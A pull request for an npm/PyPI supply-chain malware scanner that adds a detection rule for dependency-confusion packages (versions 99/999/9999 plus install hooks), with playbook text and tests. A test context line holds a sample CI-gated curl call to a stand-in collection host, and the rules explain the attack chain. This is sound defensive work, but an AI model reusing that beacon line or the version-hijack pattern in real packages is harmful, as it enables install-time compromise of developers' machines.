### PR TITLE
v2.11.121 - fix: lifecycle_version99 compound (COMPOUND-018)

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.120",
+  "version": "2.11.121",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.120",
+      "version": "2.11.121",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.120",
+  "version": "2.11.121",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -807,6 +807,13 @@ const PLAYBOOKS = {
     'Vecteur classique de dependency confusion: le code s\'execute a l\'installation. ' +
     'NE PAS installer. Verifier le nom exact du package. Signaler sur npm.',
 
+  lifecycle_version99:
+    'CRITIQUE: Version a major repdigit "win-semver" (99/999/9999) + hook lifecycle = ' +
+    'dependency confusion complete. La version elevee force npm a resoudre vers ce package ' +
+    'public au lieu du package interne prive, et le hook execute le payload a l\'installation. ' +
+    'NE PAS installer. Verifier si un package interne du meme nom existe. Regenerer les secrets ' +
+    'exposes. Signaler sur npm.',
+
   lifecycle_inline_exec:
     'CRITIQUE: Script lifecycle avec node -e (execution inline). Le code s\'execute automatiquement a npm install. ' +
     'NE PAS installer. Si deja installe: considerer la machine compromise. ' +

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -2699,6 +2699,19 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+  lifecycle_version99: {
+    id: 'MUADDIB-COMPOUND-018',
+    name: 'Lifecycle Hook + Dependency-Confusion Version',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Version a major repdigit "win-semver" (99/999/9999) AVEC hook lifecycle (preinstall/install/postinstall). Chaine complete de dependency confusion: la version elevee force la resolution npm vers le package public malveillant au lieu du package interne prive, et le hook execute le payload a l\'installation. Compound: version_99_preinstall + lifecycle_script (gate-FPR-test 2026-06-19: 0/3901 FP).',
+    references: [
+      'https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610',
+      'https://attack.mitre.org/techniques/T1195.002/'
+    ],
+    mitre: 'T1195.002'
+  },
   lifecycle_inline_exec: {
     id: 'MUADDIB-COMPOUND-004',
     name: 'Lifecycle Hook + Inline Node Execution',

--- a/src/scanner/package.js
+++ b/src/scanner/package.js
@@ -165,17 +165,24 @@ async function scanPackageJson(targetPath) {
     }
   }
 
-  // v2.10.89: Dependency confusion indicator — version >= 99 with install hooks
+  // v2.10.89: Dependency confusion indicator — repdigit "win-semver" major with install hooks.
   // Catches: @corpweb-ui/wmkt-library, @toprank/partner, @adac-fahrzeugplattform/ui
+  // v2.11.118 (2026-06-19, gate-FPR-test on the GHSA-2026 miss corpus): tightened from a
+  // plain `major >= 99` to the repdigit set {99, 999, 9999}. `>= 99` also fired on calendar
+  // versions (2026.x — 51 in the FP corpus) and legit high-version packages (chromedriver@148,
+  // taskcluster@100, @jetbrains/junie@1966, salt@3008) — masked only because the lone signal
+  // stayed HIGH (<20). Restricting to repdigit majors keeps 27/27 corpus dep-conf MALWARE at
+  // ZERO benign hits, and unblocks the lifecycle_version99 compound below (which would
+  // otherwise inherit the calendar FPs once escalated to CRITICAL).
   const versionStr = pkg.version || '';
   const majorVersion = parseInt(versionStr.split('.')[0], 10);
-  if (majorVersion >= 99) {
+  if ([99, 999, 9999].includes(majorVersion)) {
     const hasInstallHook = ['preinstall', 'install', 'postinstall'].some(s => scripts[s]);
     if (hasInstallHook) {
       threats.push({
         type: 'version_99_preinstall',
         severity: 'HIGH',
-        message: `Version ${versionStr} (major >= 99) with lifecycle hook — dependency confusion attack pattern.`,
+        message: `Version ${versionStr} (repdigit win-semver major ${majorVersion}) with lifecycle hook — dependency confusion attack pattern.`,
         file: 'package.json'
       });
     }

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -537,6 +537,23 @@ const SCORING_COMPOUNDS = [
     fileFrom: 'typosquat_detected'
   },
   {
+    // 2026-06-19 detection-gap (GHSA-2026 misses): a repdigit "win-semver" version
+    // (version_99_preinstall: major 99/999/9999) + an install lifecycle hook is the full
+    // dependency-confusion RCE chain. version_99_preinstall alone is HIGH (10), below the
+    // 20 alert threshold, so these scored ~13 and were missed (e.g. @doaction/* @99.99.99).
+    // Gate-FPR-tested on the confirmed corpus: repdigit-major + lifecycle_script = 0/3901
+    // benign FP (the 3 repdigit-version FPs have no install hook), 22/42 GT MALWARE.
+    // Both signals are package.json-level (no sameFile / excludeIfBundled needed).
+    // requireOriginalSeverityHigh anchors on version_99_preinstall (HIGH) so a lone
+    // lifecycle_script (MEDIUM, fires on every install hook) can never trip this alone.
+    type: 'lifecycle_version99',
+    requires: ['version_99_preinstall', 'lifecycle_script'],
+    severity: 'CRITICAL',
+    message: 'Dependency-confusion version (repdigit major 99/999/9999) + install lifecycle hook — install-time RCE via dependency confusion (scoring compound).',
+    fileFrom: 'version_99_preinstall',
+    requireOriginalSeverityHigh: true
+  },
+  {
     // RT-C1: Boundary-squat dep declared AND require()d in code → CRITICAL.
     // Pattern Axios UNC1069 (March 2026): wrapper looks benign, payload is in the dep.
     type: 'dependency_typosquat_require',

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 266 (261 RULES + 5 PARANOID, Track D +3, gyp_command_exec +1, gyp_phantom_exec +1, GHA-005/006 +2)', () => {
+  test('v8b: rule count is 267 (262 RULES + 5 PARANOID, Track D +3, gyp_command_exec +1, gyp_phantom_exec +1, GHA-005/006 +2, lifecycle_version99 COMPOUND-018 +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 261, `Expected 261 RULES, got ${ruleCount}`);
+    assert(ruleCount === 262, `Expected 262 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/compound-scoring.test.js
+++ b/tests/integration/compound-scoring.test.js
@@ -71,6 +71,42 @@ async function runCompoundScoringTests() {
     assert(compound.file === 'package.json', `File should come from typosquat_detected`);
   });
 
+  // ===================================================================
+  // lifecycle_version99 — version_99_preinstall + lifecycle_script (COMPOUND-018, 2026-06-19)
+  // Gate-FPR-tested: repdigit-major + install hook = 0/3901 benign FP, 22/42 GT MALWARE.
+  // ===================================================================
+  test('Compound: lifecycle_version99 — positive (depconf version + install hook)', () => {
+    const threats = [
+      { type: 'version_99_preinstall', severity: 'HIGH', file: 'package.json', message: 'Version 99.99.99 repdigit major' },
+      { type: 'lifecycle_script', severity: 'MEDIUM', file: 'package.json', message: 'preinstall: node index.js' }
+    ];
+    applyCompoundBoosts(threats);
+    const compound = threats.find(t => t.type === 'lifecycle_version99');
+    assert(compound, 'lifecycle_version99 compound should be added');
+    assert(compound.severity === 'CRITICAL', `Should be CRITICAL, got ${compound.severity}`);
+    assert(compound.file === 'package.json', `File should come from version_99_preinstall`);
+    assert(getRule('lifecycle_version99'), 'lifecycle_version99 must have a rule entry');
+    assert(getPlaybook('lifecycle_version99'), 'lifecycle_version99 must have a playbook');
+  });
+
+  test('Compound: lifecycle_version99 — negative (lifecycle_script only, no depconf version)', () => {
+    const threats = [
+      { type: 'lifecycle_script', severity: 'MEDIUM', file: 'package.json', message: 'preinstall' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'lifecycle_version99'),
+      'Should NOT fire without version_99_preinstall (a lone install hook is benign)');
+  });
+
+  test('Compound: lifecycle_version99 — negative (version_99 only, no lifecycle_script)', () => {
+    const threats = [
+      { type: 'version_99_preinstall', severity: 'HIGH', file: 'package.json', message: 'Version 99.99.99' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'lifecycle_version99'),
+      'Should NOT fire without lifecycle_script');
+  });
+
   test('Compound: lifecycle_typosquat — negative (only lifecycle_script)', () => {
     const threats = [
       { type: 'lifecycle_script', severity: 'MEDIUM', file: 'package.json', message: 'preinstall' }

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -160,11 +160,11 @@ jobs:
   // 3.3b Rule count check (Track D +3, gyp_command_exec MUADDIB-PKG-023 +1,
   // gyp_phantom_exec MUADDIB-COMPOUND-017 +1 → 259 RULES; P2b GHA-005 unpinned_action
   // + GHA-006 unpinned_action_in_risky_workflow +2 → 261 RULES)
-  test('P3: rule count is 266 (261 RULES + 5 PARANOID)', () => {
+  test('P3: rule count is 267 (262 RULES + 5 PARANOID, lifecycle_version99 COMPOUND-018 +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 261, `Expected 261 RULES, got ${ruleCount}`);
+    assert(ruleCount === 262, `Expected 262 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -178,6 +178,7 @@ const { runHttpLimiterTests } = require('./unit/http-limiter.test');
 const { runWorkerMessageDispatchTests } = require('./unit/worker-message-dispatch.test');
 const { runNetworkBrainTests } = require('./unit/network-brain.test');
 const { runMemoryGovernorTests } = require('./unit/memory-governor.test');
+const { runEventLoopMonitorTests } = require('./unit/event-loop-monitor.test');
 const { runInterruptedRecoveryTests } = require('./unit/interrupted-recovery.test');
 const { runDegradationTests } = require('./unit/degradation.test');
 
@@ -421,6 +422,7 @@ async function timed(name, fn) {
   await timed('worker-message-dispatch', runWorkerMessageDispatchTests);
   await timed('network-brain', runNetworkBrainTests);
   await timed('memory-governor', runMemoryGovernorTests);
+  await timed('event-loop-monitor', runEventLoopMonitorTests);
   await timed('interrupted-recovery', runInterruptedRecoveryTests);
   await timed('degradation', runDegradationTests);
 

--- a/tests/scanner/package.test.js
+++ b/tests/scanner/package.test.js
@@ -724,6 +724,50 @@ async function runPackageTests() {
       assert(!threat, 'Should NOT detect version_99 on normal version');
     } finally { cleanupTemp(tmp); }
   });
+
+  // --- version_99_preinstall tightening (2026-06-19 gate-FPR-test): repdigit-major only ---
+  await asyncTest('PACKAGE: version_99_preinstall — does NOT fire on calendar version (2026.x)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-pkg-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+      name: 'calendar-versioned', version: '2026.6.1',
+      scripts: { postinstall: 'node setup.js' }
+    }));
+    fs.writeFileSync(path.join(tmp, 'setup.js'), 'console.log("setup")');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(t => t.type === 'version_99_preinstall'),
+        'Calendar version 2026.x must NOT trip the dep-confusion version indicator');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: version_99_preinstall — does NOT fire on legit high major (148.x)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-pkg-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+      name: 'chromedriver-like', version: '148.0.4',
+      scripts: { postinstall: 'node install.js' }
+    }));
+    fs.writeFileSync(path.join(tmp, 'install.js'), 'console.log("install")');
+    try {
+      const result = await runScanDirect(tmp);
+      assert(!result.threats.find(t => t.type === 'version_99_preinstall'),
+        'Sequential high major (148) must NOT trip the dep-confusion version indicator');
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('PACKAGE: version_99_preinstall — still fires on repdigit 999/9999', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-pkg-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+      name: '@corp/internal-lib', version: '9999.0.0',
+      scripts: { preinstall: 'node setup.js' }
+    }));
+    fs.writeFileSync(path.join(tmp, 'setup.js'), 'console.log("setup")');
+    try {
+      const result = await runScanDirect(tmp);
+      const threat = result.threats.find(t => t.type === 'version_99_preinstall');
+      assert(threat, 'Repdigit major 9999 with install hook should still fire');
+      assert(threat.severity === 'HIGH', 'Should be HIGH severity');
+    } finally { cleanupTemp(tmp); }
+  });
 }
 
 module.exports = { runPackageTests };

--- a/tests/unit/event-loop-monitor.test.js
+++ b/tests/unit/event-loop-monitor.test.js
@@ -1,0 +1,146 @@
+const { test, asyncTest, assert } = require('../test-utils');
+
+/**
+ * Event-loop stall attribution (2026-06-18). Instrumentation that NAMES the
+ * synchronous op wedging the main-thread loop — the loop whose starvation
+ * disables the RSS breaker / governor feed / EMERGENCY purge and lets RSS climb
+ * to the cgroup cap (4-6 min of zero completions+logs before every OOM kill).
+ * Pure observability: these tests assert the lag math, the breadcrumb overlap
+ * attribution, and the end-to-end sampler — NO scan-behavior is exercised.
+ */
+
+const elm = require('../../src/monitor/event-loop-monitor.js');
+
+async function runEventLoopMonitorTests() {
+  // ── Lag core (pure) ──
+  test('LOOP-MON: observeTick seeds, then measures time blocked past the interval', () => {
+    elm._reset();
+    elm.configure({ intervalMs: 1000, thresholdMs: 5000 });
+    const seed = elm.observeTick(100);
+    assert(seed.firstTick === true && seed.lagMs === 0, 'first tick seeds with zero lag');
+    const onTime = elm.observeTick(1100); // exactly one interval later → 0 lag
+    assert(onTime.lagMs === 0, `on-time tick has no lag, got ${onTime.lagMs}`);
+    const late = elm.observeTick(400100); // ~399s later → blocked ~398s
+    assert(late.lagMs === 400100 - 1100 - 1000, `lag = elapsed − interval, got ${late.lagMs}`);
+    assert(late.windowStartMs === 1100, 'windowStart is the previous tick timestamp');
+    elm._reset();
+  });
+
+  test('LOOP-MON: isStall honors the threshold (boundary inclusive)', () => {
+    elm._reset();
+    elm.configure({ intervalMs: 1000, thresholdMs: 5000 });
+    assert(elm.isStall(4999) === false, '4999ms < 5000ms threshold is not a stall');
+    assert(elm.isStall(5000) === true, '5000ms meets the threshold');
+    assert(elm.isStall(30, 20) === true, 'explicit threshold override works');
+    elm._reset();
+  });
+
+  // ── Breadcrumb overlap attribution (deterministic via injected clock) ──
+  test('LOOP-MON: opOverlapping attributes a STILL-RUNNING op spanning the window', () => {
+    let t = 100;
+    elm._reset(() => t);
+    const crumb = elm.beginOp('extract:quickscan', { name: 'big', version: '1.0.0', unpackedSizeMb: 47 });
+    assert(crumb && crumb.startedAt === 100, 'beginOp stamps startedAt from the clock');
+    t = 400100; // op never ended; loop blocked window [100, 400100]
+    const op = elm.opOverlapping(100, 400100);
+    assert(op && op.label === 'extract:quickscan' && op.running === true, 'running op is attributed');
+    assert(op.meta.name === 'big' && op.elapsedMs === 400000, 'carries meta + elapsed');
+    elm._reset();
+  });
+
+  test('LOOP-MON: opOverlapping attributes an op that ENDED during the blocked window', () => {
+    let t = 100;
+    elm._reset(() => t);
+    const crumb = elm.beginOp('extract:prework', { name: 'native', version: '2' });
+    t = 350100;
+    elm.endOp(crumb); // ended inside the block
+    t = 360000;
+    const op = elm.opOverlapping(50, 360000);
+    assert(op && op.label === 'extract:prework' && op.running === false, 'just-ended op is attributed');
+    assert(op.durationMs === 350000, `reports how long it ran, got ${op.durationMs}`);
+    elm._reset();
+  });
+
+  test('LOOP-MON: opOverlapping returns null when nothing was instrumented (signal to widen)', () => {
+    let t = 1000;
+    elm._reset(() => t);
+    assert(elm.opOverlapping(0, 2000) === null, 'no breadcrumb → null (tells us to instrument more)');
+    // An op that ended BEFORE the window must not be mis-attributed.
+    const crumb = elm.beginOp('extract', { name: 'x' }); // started 1000
+    t = 1200; elm.endOp(crumb); // ended 1200
+    t = 9999;
+    assert(elm.opOverlapping(5000, 9999) === null, 'op ending before the window is not attributed');
+    elm._reset();
+  });
+
+  test('LOOP-MON: endOp ignores a mismatched token (nesting-safe)', () => {
+    let t = 10;
+    elm._reset(() => t);
+    const a = elm.beginOp('outer', null);
+    elm.endOp({ not: 'the token' }); // wrong token → must NOT clear `a`
+    t = 50;
+    const op = elm.opOverlapping(0, 50);
+    assert(op && op.label === 'outer', 'mismatched endOp token leaves the current op intact');
+    elm.endOp(a);
+    elm._reset();
+  });
+
+  test('LOOP-MON: buildStallRecord carries blockedSec, op label/meta, rssMb', () => {
+    let t = 0;
+    elm._reset(() => t);
+    elm.beginOp('extract:quickscan', { name: 'big', version: '3', unpackedSizeMb: 41 });
+    t = 70000;
+    const rec = elm.buildStallRecord(65000, 0, 70000);
+    assert(rec.lagMs === 65000 && rec.blockedSec === 65, 'blockedSec derived from lagMs');
+    assert(rec.op && rec.op.label === 'extract:quickscan' && rec.op.meta.unpackedSizeMb === 41, 'op + meta in the record');
+    assert(typeof rec.rssMb === 'number' && rec.rssMb > 0, 'records process RSS at the stall');
+    assert(typeof rec.ts === 'string' && rec.ts.includes('T'), 'ISO timestamp');
+    elm._reset();
+  });
+
+  // ── End-to-end sampler (behavioral) ──
+  await asyncTest('LOOP-MON: sampler fires on a real sync block and attributes the in-flight op (positive)', async () => {
+    const os = require('os'); const pathM = require('path'); const fsM = require('fs');
+    const tmpFile = pathM.join(os.tmpdir(), `loop-stalls-test-${process.pid}.jsonl`);
+    const savedEnv = process.env.MUADDIB_LOOP_STALL_FILE;
+    process.env.MUADDIB_LOOP_STALL_FILE = tmpFile; // isolate the stall log from prod data/
+    const modPath = require.resolve('../../src/monitor/event-loop-monitor.js');
+    delete require.cache[modPath];
+    const elm2 = require('../../src/monitor/event-loop-monitor.js');
+    let captured = null;
+    const stop = elm2.startLagSampler({ intervalMs: 10, thresholdMs: 40, onStall: (r) => { captured = r; } });
+    try {
+      await new Promise(r => setTimeout(r, 50)); // let the sampler seed + tick normally first
+      elm2.beginOp('extract:quickscan', { name: 'big-native', version: '1.0.0', unpackedSizeMb: 47 });
+      const until = Date.now() + 120; while (Date.now() < until) { /* busy-wait: WEDGE the event loop */ }
+      elm2.endOp();
+      await new Promise(r => setTimeout(r, 80)); // let the post-block tick observe the lag
+      assert(captured, 'onStall must fire after a >40ms loop block');
+      assert(captured.lagMs >= 40, `lag reflects the ~120ms block, got ${captured.lagMs}`);
+      assert(captured.op && captured.op.label === 'extract:quickscan', `attributes the in-flight op, got ${JSON.stringify(captured.op)}`);
+      assert(captured.op.meta && captured.op.meta.name === 'big-native', 'attribution carries the package identity');
+    } finally {
+      stop();
+      delete require.cache[modPath];
+      if (savedEnv === undefined) delete process.env.MUADDIB_LOOP_STALL_FILE; else process.env.MUADDIB_LOOP_STALL_FILE = savedEnv;
+      try { fsM.unlinkSync(tmpFile); } catch { /* best effort */ }
+    }
+  });
+
+  await asyncTest('LOOP-MON: sampler stays silent on normal (unblocked) ticks (negative)', async () => {
+    const modPath = require.resolve('../../src/monitor/event-loop-monitor.js');
+    delete require.cache[modPath];
+    const elm2 = require('../../src/monitor/event-loop-monitor.js');
+    let fired = false;
+    const stop = elm2.startLagSampler({ intervalMs: 10, thresholdMs: 5000, onStall: () => { fired = true; } });
+    try {
+      await new Promise(r => setTimeout(r, 90)); // ~9 normal ticks, none exceed 5s
+      assert(fired === false, 'no stall reported when the loop is never blocked');
+    } finally {
+      stop();
+      delete require.cache[modPath];
+    }
+  });
+}
+
+module.exports = { runEventLoopMonitorTests };


### PR DESCRIPTION
## COMPOUND-018 : lifecycle_version99

Nouveau compound `version_99_preinstall + lifecycle_script → CRITICAL`.

### Problème
Les dep-confusion 99.x avec install hooks scoraient ~13 (HIGH 10 + MEDIUM discounté), sous le seuil 20. Identifié via l'analyse de gap GHSA-2026 : 57 malwares sous-scorés, dont 22 rattrapés par ce compound.

### Fix
- **Tighten `version_99_preinstall`** : `major >= 99` → repdigit `{99, 999, 9999}`. Retire 51 FP calendrier (2026.x) + séquentiels (chromedriver@148, salt@3008, junie@1966).
- **Compound `lifecycle_version99`** (CRITICAL) : version_99_preinstall + lifecycle_script. `requireOriginalSeverityHigh` empêche le hook seul de trigger.

### Validation
- Gate FPR : **0/3901 FP** du corpus confirmé
- Recall : **22/42 GT MALWARE**, 27/27 dep-conf conservés
- 6 tests (3 compound positif/négatif + 3 tightening calendrier/séquentiel/repdigit)
- 212 passed / 0 failed, no-source-grep PASS, lint 0 erreur

### Fichiers
`package.js` (tighten) · `scoring.js` (compound) · `rules/index.js` (COMPOUND-018) · `playbooks.js` · 4 fichiers test + `run-tests.js`